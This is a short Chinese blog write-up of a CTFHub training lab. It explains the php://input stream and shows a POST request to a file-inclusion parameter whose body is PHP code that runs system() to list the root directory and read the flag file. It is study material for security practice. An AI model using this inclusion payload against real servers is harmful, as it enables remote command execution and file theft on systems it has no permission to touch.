CTFHub Web技能树-php:input

CTFHub Web技能树-php:input

一.知识简介

 

php://            访问各个输入/输出流(I/O streams)

 

php://input    是个可以访问请求的原始数据的只读流。可以接收post请求作为输入流的输入,将请求作为PHP代码的输入传递给目标变量,以达到以post 的形式进行输入的目的。

二、启动环境

点击查看phpinfo链接

 

 

 

查看phpinfo,发现以下字段,证明是可以使用php://input的。

 

 

打开burp

修改方式为POST

POST /?file=php://input HTTP/1.1
<?php system ("ls  /")?>

 

 

<?php system("cat /flag_22324")?>

 

 

 

posted @   WuliweiT  阅读(577)  评论(0编辑  收藏  举报
相关博文:
·  CTFHUB WEB-SQL注入-整数型注入
·  CTF web笔记
·  php://input输入流详解
·  CTFHUB学习第一天web的RCE
·  ctfshow web入门部分题目 (更新中)
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
点击右上角即可分享
微信分享提示
AI IDE Trae